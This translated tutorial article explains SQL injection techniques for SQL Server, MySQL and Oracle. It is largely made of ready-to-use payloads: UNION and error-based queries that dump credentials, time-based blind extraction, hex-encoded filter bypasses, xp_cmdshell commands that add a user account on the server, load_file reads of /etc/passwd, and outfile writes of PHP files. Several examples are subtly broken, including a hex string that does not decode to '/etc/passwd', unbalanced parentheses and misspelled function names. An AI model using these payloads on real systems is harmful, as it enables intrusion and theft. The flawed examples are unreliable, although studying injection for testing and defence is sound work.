Home  >  Article  >  Operation and Maintenance  >  What are the three ways of sql injection?

What are the three ways of sql injection?

青灯夜游
青灯夜游Original
2020-07-20 16:46:3121261browse

There are three ways of sql injection: 1. Numeric injection; when the input parameter is an integer, there may be a numeric injection vulnerability. 2. Character injection; when the input parameter is a string, a character injection vulnerability may exist. 3. Other types (for example: search injection, cookie injection, POST injection, etc.).

What are the three ways of sql injection?

##SQL injection principle

SQL injection attack refers to constructing special input Passed into the web application as parameters, most of these inputs are some combinations in SQL syntax. By executing the SQL statement, the attacker performs the operations required. The main reason is that the program does not carefully filter the data input by the user, resulting in illegal data intrusion. system.

SQL injection classification

1. Numeric injection

When the input parameters are integers, there may be a numeric injection vulnerability.

Suppose there is a URL:

HTTP://www.aaa.com/test.php?id=1You can guess the background SQL statement as:

SELECT * FROM table WHERE id=1

Determine the SQL injection point of numeric vulnerability:

① First enter the input box Enter a single quote '

and the SQL statement will become:

SELECT * FROM table WHERE id=1' ,

does not conform to the syntax, so this statement will definitely go wrong, causing the script program to be unable to obtain data from the database, causing the original page to be abnormal.

② Enter and 1 = 1## in the input box. The SQL statement becomes:

SELECT * FROM table WHERE id=1 and 1 = 1

The statement is correct and executes normally. The returned data is no different from the original request.

③ Enter

and 1 = 2## in the database. The SQL statement becomes:

SELECT * FROM table WHERE id=1 and 1 = 2

Although the syntax is correct and the statement executes normally, the logic is wrong because 1 = 2 is permanently false, so the returned data is different from the original request.

If all the above three steps are met, the program may have a numeric SQL injection vulnerability.

2. Character injection

When the input parameter is a string, a character injection vulnerability may exist. The biggest difference between numeric and character injection is that numeric types do not need to be closed with single quotes, while character types generally need to be closed with single quotes.

The most critical thing about character injection is how to close the SQL statement

and

comment the redundant code . Assume that the background SQL statement is as follows:

SELECT * FROM table WHERE username = 'admin'


SQL injection point for determining character type vulnerabilities

:

① It is better to enter single quotes first

admin'

to test Such an SQL statement will become:

SELECT * FROM table WHERE username = 'admin''

.

Page exception.

② Input:

admin' and 1 = 1 --

Note: There is a single quotation mark after admin '

, used to close the string, and there is a comment character

-- at the end (There is a space after the two bars!!!). The SQL statement becomes:

SELECT * FROM table WHERE username = 'admin' and 1 = 1 --

The page is displayed correctly.

③ Input:

admin' and 1 = 2 --

The SQL statement becomes:

SELECT * FROM table WHERE username = 'admin' and 1 = 2 --

Page error.

If the above three steps are met, character SQL injection may exist.

3. Other types

In fact, I think there are only two types of SQL injection: numeric and character. Many people may say that there are other methods such as: Cookie injection, POST injection, delayed injection, etc. This is indeed the case, but these types of injections are ultimately just different presentation forms of numeric and character injections or different injection locations.

The following are some common injection names:

POST injection: the injected field is in the POST data

    Cookie injection: the injected field is in the Cookie data
  • Delayed injection: Injection using database delay feature
  • Search injection: The injection point is the search place
  • base64 injection: The injected string needs to be base64 encrypted
Common Database Injection

For database injection, the attacker is nothing more than using the database to obtain more data or greater permissions, and the method of use It can be summarized into the following categories:

Query data

    Read and write files
  • Execute commands
  • For program injection, attackers No matter any database, it is doing these three things, but the SQL statements injected into different databases are different.
  • Here are the injections of three databases: Oracle 11g, MySQL 5.1 and SQL Server 2008.

    SQL Server

    1. Use error messages to extract information

    SQL Server database is a A very good database, which can accurately locate error information, is a very good thing for attackers, because attackers can extract the data they want through error messages.

    ① Enumerate the current table or column

    Assume that such a table exists:

    What are the three ways of sql injection?
    Query the details of the root user Information, the SQL statement guess is as follows:
    SELECT * FROM user WHERE username = 'root' AND password = 'root'

    An attacker can use SQL Server features to obtain sensitive information, Enter the following statement in the input box:
    ' having 1 = 1 --
    The final executed SQL statement will become:
    SELECT * FROM user WHERE username = 'root' AND password = 'root' HAVING 1 = 1 --

    Then the SQL executor may throw an error:
    What are the three ways of sql injection?

    attacker You can find that the current table name is user and the field id exists.

    An attacker can use this feature to continue to obtain other column names by entering the following statement:
    ' GROUP BY users.id HAVING 1 = 1 --
    Then the SQL statement becomes For:
    SELECT * FROM user WHERE username = 'root' AND password = 'root' GROUP BY users.id HAVING 1 = 1 --

    Throws error:
    What are the three ways of sql injection?
    You can see that the column name username is included. You can query recursively once until there is no error message returned, so you can use the HAVING clause to get all the column names of the current table.
    Note: Each column specified by Select should appear in the Group By clause, unless an aggregate function is used for this column

    ②. Extraction using data type errors Data

    The SQL Editor will throw an exception if you try to compare a string with a non-string, or convert a string to another incompatible type.

    The following SQL statement:
    SELECT * FROM user WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users)

    Executor error message:
    What are the three ways of sql injection?
    This way you can get the user's user name root. Because in the subquery SELECT TOP 1 username FROM users, the first queried username is returned. The return type is varchar type, and then compared with 1 of int type. The two types are different. The data cannot be compared and an error is reported, leading to data leakage.

    Use this method to recursively deduce all account information:
    SELECT * FROM users WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users WHERE not in ('root')).
    By constructing this statement, you can get the next user name; if you replace the username in the subquery with other column names, you can get the information of other columns, which will not be described here.

    2. Obtain metadata

    SQL Server provides a large number of views to facilitate obtaining metadata. You can first guess the number of columns in the table, and then use UNION to construct a SQL statement to obtain the data.
    For example:
    SELECT *** FROM *** WHERE id = *** UNION SELECT 1, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
    If the number of columns in the current table is 2, then The current database table can be obtained with the UNION statement. How to guess the number of columns in the current table will be described later.

    Some commonly used system database views:

    Database view Description
    SYS.DATABASES All databases in SQL Server
    SYS.SQL_LOGINS All logins in SQL Server
    INFORMATION_SCHEMA.TABLES All data tables in the current user database
    INFORMATION_SCHEMA.COLUMNS Current user All columns in the database
    SYS.ALL_COLUMNS Union of all columns of user-defined objects and system objects
    SYS .DATABASE_PRINCIPALS Exception permissions for each permission or column in the database
    SYS.DATABASE_FILES Database files stored in the database
    SYSOBJECTS Every object created in the database (including constraints, logs, and stored procedures)

    3. ORDER BY clause guesses the number of columns

    You can use the ORDER BY statement to determine the number of columns in the current table.

    For example:
    SELECT * FROM users WHERE id = 1——SQL execution is normal

    SELECT * FROM users WHERE id = 1 ORDER BY 1 (sorted by the first column) - SQL execution is normal

    SELECT * FROM users WHERE id = 1 ORDER BY 2 (sorted by the second column) - SQL execution is normal

    SELECT * FROM users WHERE id = 1 ORDER BY 3 (sorted by the third column)——SQL execution is normal

    SELECT * FROM users WHERE id = 1 ORDER BY 4 (sorted by the fourth column) - SQL throws an exception:
    What are the three ways of sql injection?
    It can be concluded that the number of columns in the current table is only 3 columns , because an error occurred when sorting by column 4. This method also applies to Oracle and MySql databases.

    After knowing the number of columns, the attacker usually cooperates with the UNION keyword to carry out the next attack.

    4. UNION query

    The UNION keyword combines two or more query results into a single result set. Most databases support UNION queries. However, there are the following basic rules for merging two results using UNION:

    • The number of columns in all queries must be the same
    • The data types must be compatible

    ① Use UNION query to guess the number of columns
    Not only can you use the ORDER BY method to guess the number of columns, the UNION method can also be used.

    There are 5 columns in the previously assumed user table. If we use UNION to query:
    SELECT * FROM users WHERE id = 1 UNION SELECT 1
    The database will issue Exception:
    What are the three ways of sql injection?
    You can query recursively until no errors occur, then you can know the number of query fields in the User table:
    UNION SELECT 1,2, UNION SELECT 1,2,3

    You can also change the number after SELECT to null, so that incompatibility exceptions are less likely to occur.

    ② Union query for sensitive information
    After knowing that the number of columns is 4, you can use the following statement to continue injecting:
    UNION SELECT 'x', null, null, null FROM SYSOBJECT WHERE xtype='U' (Note: xtype='U' means the object type is a table)

    If the data type of the first column does not match, the database will report an error, then you can Query recursively until statements are compatible. When the statement is executed normally, you can replace x with a SQL statement to query sensitive information.

    5. Use the system functions provided by SQL Server

    SQL Server provides a lot of system functions. You can use this system function to access the information in the SQL Server system tables. , without using SQL query statements.

    For example:

    • SELECT suser_name(): Returns the user’s login identification name
    • SELECT user_name(): Returns the database user name based on the specified identification number
    • SELECT db_name(): Returns the database name
    • SELECT is_member('db_owner'): Whether it is a database role
    • SELECT convert(int, '5'): Data type conversion

    6. Stored Procedure

    Stored Procedure (Stored Procedure) is a set of SQL "functions" used to complete specific functions in large database systems, such as: Execute system commands, view the registry, read disk directories, etc.

    The stored procedure most commonly used by attackers is "xp_cmdshell". This stored procedure allows users to execute operating system commands.
    For example: If there is an injection point in http://www.aaa.org/test.aspx?id=1, then the attacker can implement a command attack:
    http: //www.aaa.org/test.aspx?id=1; exec xp_cmdshell 'net user test test /add'

    The final executed SQL statement is as follows:
    SELECT * FROM table WHERE id=1; exec xp_cmdshell 'net user test test /add'
    The statement after the semicolon can create a new username test and password test for the attacker on the other party's server. user.
    Note: Not any database user can use this type of stored procedure, Users must hold CONTROL SERVER permissions.

    Common dangerous stored procedures are as follows:

    Stored procedures Description
    sp_addlogin Creates a new SQL Server login that allows users to connect to a SQL Server instance using the SQL Server identity
    sp_dropuser Delete the database user from the current database
    xp_enumgroups Provide a Microsoft Windows local group list or define a global group list in the specified Windows domain
    xp_regread Read the registry
    xp_regwrite Write the registry
    xp_redeletevalue Delete registry
    xp_dirtree Read directory
    sp_password Change password
    xp_servicecontrol Stop or activate a service

    In addition, any database requires specific permissions when using some special functions or stored procedures. Common SQL Server database roles and permissions are as follows:

    Role Permission
    bulkadmin Can run BULK INSERT statement
    dbcreator Can create, change, delete and restore any database
    diskadmin Can manage disk files
    processadmin Can plant instances running in the database engine
    securityadmin Can manage login names and their attributes; can take advantage of GRANT, DENY, and REVOKE server-level permissions; can also take advantage of GRANT, DENY, and REVOKE database-level permissions; in addition, you can redo Set the password for the SQL Server login
    serveradmin You can change server-wide configuration options and shut down the server
    setupadmin Can add and delete linked servers, and can execute certain system stored procedures
    sysadmin Can perform any activity in the database engine

    7. Dynamic execution

    SQL Server supports dynamic execution of statements. Users can submit a string to execute SQL statements.

    For example: exec('SELECT username, password FROM users')

    You can also use the exec function to execute by defining a hexadecimal SQL statement. Most web applications and firewalls filter single quotes. Using exec to execute hexadecimal SQL statements can break through many firewalls and anti-injection programs, such as:

declare @query varchar(888)
select @query=0x73656C6563742031
exec(@query)

or:
declare/ **/@query/**/varchar(888)/**/select/**/@query=0x73656C6563742031/**/exec(@query)

MySQL

The injection process of SQL Server is described in detail before. When injecting into other databases, The basic idea is the same, but the functions or statements used by the two are slightly different.

1. Comments in MySQL

MySQL supports the following 3 comment styles:

  • “#”: Comments start with “#” To the end of the line
  • "-- ": The comment goes from the "--" sequence to the line position. It should be noted that when using this comment, it needs to be followed by a space
  • /**/: Comment the characters
# from /* to */

##2. Obtain metadata

MySQL 5.0 and above provide INFORMATION_SCHEMA, which is an information database that provides a way to access database metadata. Here's how to read the database name, table name, and column name from it.

① Query the user database name


SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATAThe INFORMATION_SCHEMA.SCHEMATA table provides information about the database.

②Query the current data table


SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = (SELECT DATABASE())INFORMATION_SCHEMA.TABLES table gives the information of the tables in the database .

③Query all fields of the specified table


SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '***'INFORMATION_SCHEMA.COLUMNS The table gives the column information.

3. UNION query

is roughly the same as SQL Server and will not be described here.

4. MySQL function utilization

Whether it is MySQL, Oracle or other databases, there are many built-in system functions. These database functions are very similar. Next, we will introduce some of them. MySQL functions that are helpful for penetration testers.

① load_file() function file reading operation

MySQL provides the load_file() function to help users quickly read files, but the location of the file must be on the server , the file must be an absolute path, and the user must have FILE permission, and the file capacity must be less than max_allowed_packet bytes (default is 16MB, maximum is 1GB).

SQL statements are as follows:


UNION SELECT 1, load_file('/etc/passwd'), 3, 4

#Usually some anti-injection statements are not allowed If single quotes appear, you can use the following statement to bypass:


UNION SELECT 1, load_file(0x2F6561342F706173737764), 3, 4 #"0x2F6561342F706173737764" is the sixteenth of "/etc/passwd" Base conversion result.

When the browser returns data, there may be garbled characters, so you can use the hex() function to convert the string into hexadecimal data.

② into outfile file writing operation

MySQL provides the operation of writing files to disk. Like load_file(), it must have FILE permissions and the file must be full. Path name.

Write file:


SELECT '' into oufile 'C:\wwwroot\1.php'

③ Connection string

MySQL If you need to query multiple data at one time, you can use the concat() or concat_ws() function to complete it.

SELECT name FROM student WHERE id = 1 UNION SELECT concat(user(), ',', database(), ',', version());

You can also change the comma to hexadecimal representation: 0x2c

5. MySQL explicit error injection

MySQL also has explicit error injection, which can be like SQL Server database, use error extraction messages.

① Execute SQL statements through updatexml function

First understand the updatexml() function:

updatexml (XML_document, XPath_string, new_value);
First Parameters: XML_document is in String format, which is the name of the XML document object;
The second parameter: XPath_string (string in Xpath format),
The third parameter: new_value, String format, replaces the found match Conditional data

SELECT * FROM message WHERE id = 1 and updatexml(1, (concat(0x7c, (SELECT @@version)))), 1)concat The () function concatenates it into a string, so it will not conform to the format of XPATH_string, resulting in a format error, error, and unrecognizable content:

What are the three ways of sql injection?

② Through the extractvalue function
SEELCT * FROM message WHERE id= 1 AND extravtvalue(1, concat(0x7c, (SELECT user())))
The same error is reported and the current user is displayed:
What are the three ways of sql injection?

6. Wide byte injection

Wide byte injection is caused by encoding inconsistencyCaused, this kind of injection generally occurs in PHP MySQL.

There is a magic_quotes_gpc option in the PHP configuration file php.ini, which is called magic quotes. When this option is turned on, use single quotes ('), double quotes accepted by GET, POST, and Cookie. Quotation marks ("), backslash () and NULL characters will be automatically escaped with a backslash .

Use the PHP code as follows to use $_GET to receive parameters:
What are the three ways of sql injection?

If you access the URL: http:/www.xxser.com/Get.php?id=', it will be displayed as follows:
What are the three ways of sql injection?

Single quotes# After ##' is escaped, it becomes \'. In MySQL, \' is a legal character, so there is no way to close the single quote, so , injection cannot be formed when the injection type is character type.

But if you enter:

�', visit the URL: http:/www.xxser.com/Get.php?id =�', the display is as follows:
What are the three ways of sql injection?It can be found that the single quotes are not escaped this time, so that you can break through the PHP escape and continue to close the SQL statement for SQL injection.

7. MySQL long character truncation

MySQL long character truncation is also known as "SQL-Column-Truncation".

There is a sql_mode option in a setting in MySQL , when sql_mode is set to default, that is, when the STRICT - ALL_TABLES option is not turned on, MySQL will only prompt a warning instead of an error when inserting an overly long value.

Assume there is a table as follows:


What are the three ways of sql injection?The length of the username field is 7.

Insert SQL statements respectively:

① Insert normal SQL statements:

INSERT users(id, username, password) VALUES( 1, 'admin', 'admin');
What are the three ways of sql injection?Successfully inserted.

② Insert the wrong SQL statement so that the length of the username field exceeds 7:


INSERT users(id, username, password) VALUES(2, 'admin ', 'admin');
What are the three ways of sql injection?Although there was a warning, the insertion was successful.

③ Try inserting an incorrect SQL statement again, the length of which exceeds the original specified length:


INSERT users(id, username, password) VALUES(3, 'admin x), 'admin;
What are the three ways of sql injection?

Query database:


What are the three ways of sql injection?You can see that all three pieces of data have been inserted into the database, but the values ​​have changed. By default, MySQL stages data if it exceeds the default length.

But how to attack like this? By querying the user with the user name admin:


What are the three ways of sql injection?, we can find that only the user with the user name admin is queried, but the other two admin users with inconsistent lengths are also queried, which will cause some security issues. question.

For example, there is an administrator who judges this when logging in:


$sql = "SELECT count(*) FROM users WHERE username = 'admin' AND password = '***'";

Then the attacker only needs to register a username "admin" whose length exceeds the specified length to easily enter the backend management page.

8. Delayed injection

Delayed injection is a kind of blind injection technology, which is an injection technology based on time difference. The following uses MySQL as an example to introduce delayed injection.

There is a function in MySQL: sleep(duration). This function means to run the statement after the duration parameter is given for a few seconds. The following SQL statement:


SELECT * FROM users WHERE id = 1 AND sleep(3) means that the SQL statement will be executed after 3 seconds.

You can use this function to determine whether the URL has a SQL injection vulnerability. The steps are as follows:
What are the three ways of sql injection?
It can be concluded from the world returned by the page that the DBMS executed and sleep (3) statement, so that you can determine that the URL has a SQL injection vulnerability.

Then the data can also be read through the sleep() function, but it requires the cooperation of other functions. The steps are as follows:
①Query the current user and obtain the string length
Execute the SQL statement:
AND if(length(user()) = 0, sleep(3), 1)
If there is a 3-second delay, you can determine the user string length , the half algorithm is usually used to reduce judgment when injecting.

② Intercept the first character of the string and convert it to ASCII code
AND if(hex(mid(user(), 1, 1)) = 1, sleep(3), 1)
AND if(hex(mid(user(), 1, 1)) = 2, sleep(3), 1)
......
keeps changing The first character can be guessed after a delay of 3 seconds until the ASCII code appears.

③ Recursively intercept each character of the string and compare it with the ASCII code respectively
AND if(hex(mid(user(), L, 1)) = N, sleep(3), 1)
Note: The position of L represents the character of the string, and the position of N represents the ASCII code.

Not only do delay functions exist in MySQL, but there are also functions with similar functions in databases such as SQL Server and Oracle, such as waitfor delay in SQL Server and DBMS_LOCK.SLEEP in Oracle.

Oracle

1. Obtain metadata

Oracle also supports querying metadata, as follows It is a commonly used metadata view injected by Oracle:
① user_tablespaces view, view table spaces
SELECT tablespace_name FROM user_tablespaces

② user_tables view, view all tables of the current user
SELECT table_name FROM user_tables WHERE rownum = 1

③ user_tab_columns view, view all columns of the current user, such as querying all columns of the user table:
SELECT column_name FROM user_tab_columns WHERE table_name = 'users'

④ all_users view, view all users of the Oracle database
SELECT username FROM all_users

⑤ user_objects view, view the current All objects of the user (table names, constraints, indexes)
SELECT object_name FROM user_objects

2. UNION query

Oracle and MySQL It also does not support multiple statement execution. Unlike SQL Server, which can be separated by semicolons to inject multiple SQL statements.

①Get the total number of columns
The method of getting the total number of columns is similar to the previous two databases, and can still be completed using the ORDER BY clause.

Another method is to use the UNION keyword to determine, but Oracle stipulates that each query must be followed by the name of the table, otherwise the query will not be established.

Can be used in Oracle:
UNION SELECT null, null, null ...... FROM dual
The dual here is a virtual table in Oracle, in the unknown database If any tables exist, you can use this table as a query table.

Then get non-numeric type columns, that is, columns that can display information :
UNION SELECT 'null', null, null, …… FROM dual
UNION SELECT null, 'null', null, …… FROM dual

Enclose each null in single quotation marks ',If an error is reported, it is not a string type column; if returns normal, it is a string type column, and you can insert a query statement at the corresponding position to obtain the information.

② Obtain sensitive information
Common sensitive information is as follows:

  • Current user permissions:SELECT * FROM session_roles
  • Current database version: SELECT banner FROM sys.v_$version WHERE rownum = 1
  • Server export IP: This can be achieved with utl_http.request
  • Server listening IP: SELECT utl_inaddr.get_host_address FROM dual
  • Server operating system: SELECT member FROM v$logfile WHERE rownum = 1
  • Server SID: SELECT instance_name FROM v$instance
  • Current connected user: SELECT SYS_CONTEXT('USERENV', 'CURRENT_USER') FROM dual

③ Obtain the database table and its contents
After knowing the number of columns in the table, you can query the table name and column name by querying metadata, and then query the data, such as:
http://www.aaa.org/new.jsp?id=1 UNION SELECT username, password, null FROM users --
Note: Pay attention to the data when querying data. Type, otherwise it cannot be queried and can only be tested one by one and change the query position of the parameters.

The above is the detailed content of What are the three ways of sql injection?. For more information, please follow other related articles on the PHP Chinese website!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn